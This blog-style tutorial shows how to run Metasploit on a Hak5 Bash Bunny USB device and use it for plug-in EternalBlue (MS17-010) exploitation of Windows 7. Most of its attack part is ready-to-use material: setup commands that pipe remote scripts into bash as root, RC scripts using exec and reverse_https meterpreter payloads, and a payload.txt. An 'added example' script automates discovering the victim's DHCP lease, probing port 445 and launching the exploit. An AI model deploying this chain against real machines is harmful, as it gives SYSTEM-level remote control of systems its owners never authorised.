I have finally got the Bash Bunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0 A-Wing that I used 6 years ago.
The Bash Bunny is capable of running the Metasploit Framework: it has 512 MB RAM, an ARMv7 CPU (v7l) and 3 GB of internal flash storage.
The EternalBlue exploit that has been ported to the Metasploit Framework is an ideal candidate for automatic exploitation from the Bash Bunny. A true hacking device :)
So let's first prepare the Bash Bunny (make sure you can SSH to the device and have internet connection sharing set up; the setup is covered here). I did all of the setup on a Linux system.
We need to prepare a couple of things to be able to run Metasploit on the Bash Bunny, so here are the rough steps I followed.
Make sure to set some date for TLS/SSL to work ;) The Bash Bunny has no real-time clock, so certificate validation fails until the clock is set:

# date -s "20170523"

Add this to /etc/apt/sources.list:

deb http://http.us.debian.org/debian/ jessie-updates main

# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev
# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh
# rvm requirements
# rvm list known
# rvm install 2.3.3
# vi /root/.bashrc

Add at the end of /root/.bashrc (the RVM profile script lives in /etc/profile.d/, the same file sourced above):

source /etc/profile.d/rvm.sh
rvm use 2.3.3 --default

# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh
# ./msf_vps_installer.sh
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

Note that both the curl-to-bash RVM install and the third-party msf_vps_installer.sh run unreviewed code as root on the device; fetch the scripts first and read them before executing if you care about what ends up on your attack platform.
You should now be able to run Metasploit on the Bash Bunny.
Now that we have a working Metasploit on the Bash Bunny, all that is really needed is to arm it and load the EternalBlue exploit via a Metasploit RC script. Here is an example script, eternal-cmd.rc (the remote IP is the address that the Bash Bunny's dhcpd assigns to the target system you plug the device into).
Check /etc/dhcp/dhcpd.conf: the default range 172.16.64.10 172.16.64.12 hands out one of three addresses, so narrow it to a single value, range 172.16.64.64 172.16.64.64, and RHOST becomes predictable.

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit
The above is ideal when we want an NT AUTHORITY\SYSTEM cmd shell on the target Windows 7 SP1 x64 while the desktop is unlocked.
If the target is locked, a cmd window popped on the desktop cannot be used, so we can use another payload that calls back to the Bash Bunny instead. Something like windows/x64/meterpreter/reverse_https would be ideal, as we already know the LHOST value: the Bash Bunny's own side of the USB network. So RHOST would again be 172.16.64.64 and LHOST 172.16.64.1. This is easily expressed in a second Metasploit RC script ;)
The Metasploit RC scripts should be placed in /root/metasploit-framework on the Bash Bunny so we can call them from the payload.txt of the corresponding attack switch position.
So ideally payload.txt (in switch1 or switch2) would look like this:

#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# Set some current time ..... check your watch
date -s "20170523 23:23"
LED ATTACK
# msfconsole is backgrounded, so LED FINISH fires as soon as it is launched,
# not when the exploit has actually run
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
LED FINISH
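The payload above launches msfconsole immediately after ATTACKMODE and relies on the dhcpd range being pinned to one address. The following is an added example, not the original post's payload: it reads the target's address from the ISC dhcpd lease file, waits for the host's DHCP client to actually take a lease, confirms 445 is reachable, and only then writes the RC script (either the cmd.exe variant from the post or the reverse_https variant for a locked screen) and starts msfconsole. The lease-file path /var/lib/dhcp/dhcpd.leases, the loot directory /root/udisk/loot/, LPORT 443 and the LED FAIL state are assumptions, not taken from the page; the LED and ATTACKMODE helpers only exist on the Bash Bunny, so that part of the script is guarded and the functions can be tested on any Linux box.

```shell
#!/bin/bash
# Added example (not from the original post): discover the target's DHCP
# lease instead of pinning the range to a single address, write the RC
# file, and only then launch msfconsole.
# Assumptions (not stated on the page): the ISC dhcpd lease file is
# /var/lib/dhcp/dhcpd.leases, the Bash Bunny side of the USB network is
# 172.16.64.1, and the log goes to /root/udisk/loot/.

LEASES=${LEASES:-/var/lib/dhcp/dhcpd.leases}
LHOST=${LHOST:-172.16.64.1}
MSF_DIR=${MSF_DIR:-/root/metasploit-framework}

# Print the IP of the most recent lease dhcpd marks "binding state active".
# Returns 1 when no active lease exists yet.
lease_ip() {
  awk '
    $1 == "lease"                       { ip = $2 }
    $1 == "binding" && $3 == "active;"  { active = ip }
    END { if (active == "") exit 1; print active }
  ' "$1"
}

# Poll the lease file for up to $2 seconds (default 60) and print the IP once
# the target has pulled an address. Launching msfconsole right after
# ATTACKMODE races the host's DHCP client; this closes that window.
wait_for_lease() {
  local file=$1 deadline=$(( $(date +%s) + ${2:-60} )) ip
  while [ "$(date +%s)" -lt "$deadline" ]; do
    if ip=$(lease_ip "$file" 2>/dev/null); then printf '%s\n' "$ip"; return 0; fi
    sleep 1
  done
  return 1
}

# TCP connect check with a 3-second budget (bash /dev/tcp, no nmap needed).
# A filtered 445 (host firewall) fails here instead of inside the exploit.
port_open() {
  timeout 3 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Emit the msfconsole RC script. Mode "cmd" matches the post's eternal-cmd.rc;
# "meterpreter" is the locked-screen variant with a reverse HTTPS handler
# listening on the Bash Bunny (LPORT 443 is an assumption).
gen_rc() {
  local rhost=$1 lhost=$2 mode=${3:-cmd}
  printf 'use exploit/windows/smb/ms17_010_eternalblue\n'
  printf 'set RHOST %s\n' "$rhost"
  case $mode in
    cmd)
      printf 'set PAYLOAD windows/x64/exec\nset CMD cmd.exe\nexploit\n' ;;
    meterpreter)
      printf 'set PAYLOAD windows/x64/meterpreter/reverse_https\n'
      printf 'set LHOST %s\nset LPORT 443\nset ExitOnSession false\nexploit -j\n' "$lhost" ;;
    *) printf 'unknown mode: %s\n' "$mode" >&2; return 2 ;;
  esac
}

# Bash Bunny payload flow; only runs where the LED/ATTACKMODE helpers exist,
# so this file can be sourced and exercised on an ordinary Linux box.
if command -v ATTACKMODE >/dev/null 2>&1; then
  LED SETUP
  ATTACKMODE RNDIS_ETHERNET
  date -s "20170523 23:23"            # TLS needs a sane clock; there is no RTC
  LED ATTACK
  if RHOST=$(wait_for_lease "$LEASES" 90) && port_open "$RHOST" 445; then
    gen_rc "$RHOST" "$LHOST" cmd > "$MSF_DIR/eternal-cmd.rc"
    "$MSF_DIR/msfconsole" -q -r "$MSF_DIR/eternal-cmd.rc" > /root/udisk/loot/eternal.log 2>&1 &
    LED FINISH
  else
    LED FAIL                          # no lease, or 445 filtered by the host firewall
  fi
fi
```

Pass "meterpreter" as the third argument of gen_rc for the locked-screen case; the dhcpd range can then stay at its default, since RHOST is whatever the target actually took.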
The target Windows 7 must have SMB port 445 reachable from the USB network the Bash Bunny creates. A default Windows install has the Windows Firewall on, and a newly seen adapter such as the RNDIS interface lands in the Public profile where inbound 445 is blocked, so the attack won't work there. For demonstration purposes we assume the firewall is off.
After a while you should see an NT AUTHORITY\SYSTEM cmd shell pop up on the Win 7 desktop :)
This is an nmap scan of the target Windows 7 after the successful EternalBlue attack:

Host is up, received arp-response (0.0014s latency).
Scanned at 2017-05-23 23:09:43 for 149s
Not shown: 990 closed ports
Reason: 990 resets
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC

Here is a short demo (done in VirtualBox, simulating the actual Bash Bunny attack):